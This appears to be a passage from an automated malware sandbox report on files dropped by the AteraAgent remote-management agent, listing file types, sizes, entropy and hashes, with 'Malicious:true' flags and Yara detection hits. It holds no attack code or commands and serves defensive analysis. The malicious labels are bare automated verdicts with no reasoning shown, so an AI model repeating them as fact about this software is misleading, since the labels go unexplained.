                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):27184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                                                                                                                  MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                                                                                                                  SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                                                                                                                  SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                                                                                                                  SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73264
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                                                                                                                  MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                                                                                                                  SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                                                                                                                  SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                                                                                                                  SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3585766
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.9999279847863685
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:XOzuWD7XM4OvRQW56YWuCrMXa7ANNBvlXWKCI:XauWD7cjGKWuyOr
                                                                                                                                                                                                                                                                                                                                  MD5:E010D1F614B1A830482D3DF4BA056F24
                                                                                                                                                                                                                                                                                                                                  SHA1:5873E22B8C51A808C06A3BBF425FCF02B2A80328
                                                                                                                                                                                                                                                                                                                                  SHA-256:98A98DD1DF25D31A01D47EAF4FA65D5F88BC0AD166F8F31D68F2994B4F739A9B
                                                                                                                                                                                                                                                                                                                                  SHA-512:727877929530E08062611868FD751D1B64E4C7D28C26B70F14C7CD942B1AE1579CBA2A2EF038BAD07032EF728AE277963FFB3E1AB7A5C28351326FABAD84DAA6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398384
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2554691460003795
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:OLrnDNjiDx+xdShTv/51LtpYbgPuXhN2sHY:OLcDx+72/51+cuXhN2Z
                                                                                                                                                                                                                                                                                                                                  MD5:5E3252E0248B484E76FCDBF8B42A645D
                                                                                                                                                                                                                                                                                                                                  SHA1:11AE92FD16AC87F6AB755911E85E263253C16516
                                                                                                                                                                                                                                                                                                                                  SHA-256:01F464FBB9B0BFD0E16D4AD6C5DE80F7AAD0F126E084D7F41FEF36BE6EC2FC8E
                                                                                                                                                                                                                                                                                                                                  SHA-512:540D6B3CA9C01E3E09673601514AF701A41E7D024070DE1257249C3C077AC53852BD04AB4AC928A38C9C84F423A6A3A89AB0676501A9EDC28F95DE83818FB699
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1459
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                                                                                                                  MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                                                                                                                  SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                                                                                                                  SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhWQn:WZn
                                                                                                                                                                                                                                                                                                                                  MD5:5796D1F96BB31A9D07F4DB8AE9F0DDB3
                                                                                                                                                                                                                                                                                                                                  SHA1:93012724E6CC0A298838AEDE678806E6C0C6517D
                                                                                                                                                                                                                                                                                                                                  SHA-256:A90D255CCE3B419641FA0B9BA74D4DA464E0CE70638A9C2EBA03D6B34FCA1DC4
                                                                                                                                                                                                                                                                                                                                  SHA-512:890112DDCB3B92B739C0DD06721EFA81926CE3AAB04C55CDADB8C4E6B7A28C9796F08F508249DB189547DC4755804AA80CC8B104DD65C813A0450AAD2CDDA21C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=37.8
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):102448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190879178656762
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87Hxm:g2bYbYSWd85I5sSakFQhHL8g
                                                                                                                                                                                                                                                                                                                                  MD5:A86884A9A1C75604B2114E09B738FCF9
                                                                                                                                                                                                                                                                                                                                  SHA1:A82B444BF09CFCAE36F532C4EB4B8C5EF0933F6A
                                                                                                                                                                                                                                                                                                                                  SHA-256:EEF751E3B01C4071A1BA34E96B663E93631C51485AF31055C3EB2F75866F9FEC
                                                                                                                                                                                                                                                                                                                                  SHA-512:4B97A3D4C37129440816D0524CDB1C485AE68B6C6735857C157D7EA76ADD91241B7185C831C646713CFB4DFB3EC95E577F98088D08ACBB0313837CA584474299
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.997149012234495
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:S4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87Hxsfn:S4auS7S5Ea6WMcpu8Mn
                                                                                                                                                                                                                                                                                                                                  MD5:0E5155ECBE5A1797644F1610DAA15583
                                                                                                                                                                                                                                                                                                                                  SHA1:89677E0F9443D52C73D4E0B91C5AEE5215EC4E88
                                                                                                                                                                                                                                                                                                                                  SHA-256:9BAF23C814DD100B2AC9511C9A2E5302DEE1FFB1807DEA021E1D317BA36901CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:3F80A871547BDF47F0A5B58F54B9597D0894580FCEE8F53DD08C8A80658697FA9C9426AB8D47A40B0CDCF53D11769C654D26A3B530AD39A3A6E37D468CA309D3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.240342116807372
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:bu2lKxktXgl4icipJNz671/nVYWREDnAvk2jkbukZmyJsldySMcAn9fG1EcfgrYM:iF+qo7mDEwj4NXLGcfgruFcg7HxRM7
                                                                                                                                                                                                                                                                                                                                  MD5:F64746D633211D129AEC5DB988BCC9B1
                                                                                                                                                                                                                                                                                                                                  SHA1:78E7047265B0DF15C54FE84261D2A0B3568FEF31
                                                                                                                                                                                                                                                                                                                                  SHA-256:9EC285FDB857D5618FBD794464135BC56823B08146EA41F24FCEC3135F0E1C0B
                                                                                                                                                                                                                                                                                                                                  SHA-512:31BCE8F3DC415F562354044BA490A9252E6C20CAA38D5162AB3929111566BCA7E97D609EACAC4712E814AA8AACFCB7B32360E4F6EE5521D6223DCC4617A5614F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408313907878965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:RQMnMYPWMXMwtKsSdj3xn91SPSvwzE8Kku6P3A+wf+bMEpYinAMxCk15:R9MYPJS/16/E8/3A+++bF7Hx315
                                                                                                                                                                                                                                                                                                                                  MD5:1CAB625AAF9CBCAB46B1455BCA45EF4C
                                                                                                                                                                                                                                                                                                                                  SHA1:274A3B9134AA4530110F29C1858A85D86D4A396D
                                                                                                                                                                                                                                                                                                                                  SHA-256:1CB4C57049F47E3EEFB1C2BAB2BA34A17ABDA610DC3D4D331A9B33B40B00307F
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF4A53BFB9DCF13C87ED6E79640371908C73E7D67765B724C509B4EB7F3F66962F0883094640497CCD2FFCD255D1E46A50B33850E8B0B2D1CC684D40DE24F5D7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):155184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.247374284901675
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:A0feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+YkY:1P80zukOltwW9
                                                                                                                                                                                                                                                                                                                                  MD5:12572F87CCF0E40406B3554A1A6D3905
                                                                                                                                                                                                                                                                                                                                  SHA1:C9E238EF065D38400D084265EE056B2ABB694224
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FDB589EBADF91A869EAA3A850B0FB17A8AB96BED78422E28F7EFAF63BC040F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:D397888AACB1B787662B1678A24E24DDFA7A42C5363AC673706934A1A42E13F5ED55956D478FAF0998C77891A64F5F26E85DCFA7FFC0A6AE87DF26B3C24C4314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215088
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030878409231256
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:x1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sA:YIzm6pOIgvr75
                                                                                                                                                                                                                                                                                                                                  MD5:44EBFB8CE52A4EFEDF07DA6875CA230E
                                                                                                                                                                                                                                                                                                                                  SHA1:824585DB12A35588F25C0CC5DA77EAEF94011CAD
                                                                                                                                                                                                                                                                                                                                  SHA-256:292F94823959CAFAAA77B81C0A490EA9ACF90B2553727BF3E74C1AE3A7F8AC01
                                                                                                                                                                                                                                                                                                                                  SHA-512:89DD6F5E827A9E23A8F7DBA8F89F55F2A01B290756AE7A6371A5934E9AFC6B3C5702DC0CADAB061405AEA4F2AC275902D8094E7A0ECDA29C8A438C6BCE46ABD0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):354352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.153589479592355
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:Qr/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvY2:Qhpp9xxIBeXGfvY2
                                                                                                                                                                                                                                                                                                                                  MD5:53594510735A737A2B25AF4B396EFE8F
                                                                                                                                                                                                                                                                                                                                  SHA1:3F4664E88F44BBDCA29AFFB78D866A76ED128965
                                                                                                                                                                                                                                                                                                                                  SHA-256:DFBBDBA40745B2FCDEC5973D1BB0352DD8618996A6231411C48D87D11C63D07A
                                                                                                                                                                                                                                                                                                                                  SHA-512:D9EBC5B83D8727E596EA6A72C49F58C5CB2BC02EC24B432709BCAA7C1C49E267F85520315EF644EC75DC24E3A5D49F64292A295822B27EDEFF452F552D8B89AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):883760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.071511083932349
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:o1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQs:o1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                                                                  MD5:286642CD396C5B6CADC906B112B493EE
                                                                                                                                                                                                                                                                                                                                  SHA1:CB625FDBD26798B3042BC5CFFD010F4E73CDAF1B
                                                                                                                                                                                                                                                                                                                                  SHA-256:004BF709595E808AE59558AE7510A40277B7E31D99A5580B0E07F136EAE09130
                                                                                                                                                                                                                                                                                                                                  SHA-512:49773E5AD432F893C559308DA144596CE1DFB967DB5FCFB1805528CC7535E70A181ED8801CAE43A47B58656C9925A236B06A4F2C67802A1A875A3DCE3C9002DD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960469418569573
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:2BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUD:2BA/ZTvQD0XY0AJBSjRlXP36RMG6
                                                                                                                                                                                                                                                                                                                                  MD5:B61A163EC8F1E6A3A3572A90BA23F7CB
                                                                                                                                                                                                                                                                                                                                  SHA1:467FBA9F1C171B58B76F4E9E24ABA1CE5C91D02F
                                                                                                                                                                                                                                                                                                                                  SHA-256:87DA900259BEA3BB65D984FB6FCD3134661E3EB0883EBF24981D50CA5D36F51A
                                                                                                                                                                                                                                                                                                                                  SHA-512:87EADB61D95EF67CEA0EC8CF15C2E285AFF8C92941ADB47DBCE6886796DE45B4940EFA803D2A9333FADD09473E1B1A34660042D12562FB07EAF4A59C401244CA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):293424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.121629065121692
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:admT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yB:adc7N/WkQHr64B
                                                                                                                                                                                                                                                                                                                                  MD5:3362FDB62A7980CA70C44B4DBDA5BE9B
                                                                                                                                                                                                                                                                                                                                  SHA1:77B328FD868E9BE19165C39B541E815BAD1FE13F
                                                                                                                                                                                                                                                                                                                                  SHA-256:A6B74A797384F89B692F2E1027A3F73B4FAD2A97914208158869A33068132A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:D0441E5C747707434C02A64E8FF3A49EDF33CFF2C9D22F2C22E8BDFEBC30A3CDF79B2ED96B8ABD819ECD042876BAA77C32E119EBB05BA0ECAC73DFE2BF971E86
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):277040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.190725872261733
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:ISOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYl5:XuQlBAMW0BvltxZ66
                                                                                                                                                                                                                                                                                                                                  MD5:66C97A4217593113658977F5AEFC18D8
                                                                                                                                                                                                                                                                                                                                  SHA1:A7E4FF9BDB3800C1E93A0D521B53E344A10699FF
                                                                                                                                                                                                                                                                                                                                  SHA-256:9AD65CC593BFC60815124C6377A8F3EA4F031BCA01C688FB543B50A2B6418764
                                                                                                                                                                                                                                                                                                                                  SHA-512:D2A474718A38AA0EA738200D7584A5C21552DC76428176026C5509AE606FEA534F4AEABEDF93D5BAE5735754D82B2D93E4CFB67BCFEA9A435147D7BB4B1F0722
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):284208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.117308680869445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:QZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHe:Ggo0WPVTXg+
                                                                                                                                                                                                                                                                                                                                  MD5:A6D30251ED124D7656F523A7DF177D09
                                                                                                                                                                                                                                                                                                                                  SHA1:48092D267E067C1967B5ACF1AEBD9A18F0B91515
                                                                                                                                                                                                                                                                                                                                  SHA-256:EC81827B885C0B109AAA3882469BB41D26871274B2E39D3B227FBD18858BF6A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:466809068B5813AC5531D9E5C76BA080A3A15B0D1AFF2A7187149CD5366D990DFD07DF1D51EEB8FCC656ED5C2D1C099AC32E0416F219FC38B64BD1A2351EE502
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677526036924594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:gy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOq9tH6:guhMaVmzDC67EpYinAMxCQ
                                                                                                                                                                                                                                                                                                                                  MD5:8F678B241B955CF86CF65136ADE90539
                                                                                                                                                                                                                                                                                                                                  SHA1:DFD92464B9C5D6822062721C7C3497CD30850CC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:15F8EEDC717B18D1A43BB3295BE6787E0DF002C284A06A4B9198851BCCFEB7F2
                                                                                                                                                                                                                                                                                                                                  SHA-512:482E6E33F22D7DC68D075600E3C6131A0B563796E34BEBE6352BE8455BD4ECC72F7B682C3E203FEE9CED67C78B60A96B58037CA7499D4F0F86E0B33AB836F048
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):409136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.098204637389941
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:bPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc17:p6heZBJm333M89QA+
                                                                                                                                                                                                                                                                                                                                  MD5:5B3639406ABB5AD7F16A90124B708862
                                                                                                                                                                                                                                                                                                                                  SHA1:466DB9D6BC5F2A8EB205E5F3A7F2EC8C52809597
                                                                                                                                                                                                                                                                                                                                  SHA-256:83717328623F05F5987DC258332BCA21C1F2858B7CE6B834AF5DA687B0948847
                                                                                                                                                                                                                                                                                                                                  SHA-512:F10717408E0140C8DBEFCCE9501CF03B86CECD32F2B55770879C28E21D793E45BD8B7EEED52E56E3386000A7BEEF7F0BDD05EBEFF99A44D1056512F48063F71C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51760
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.234968936412768
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
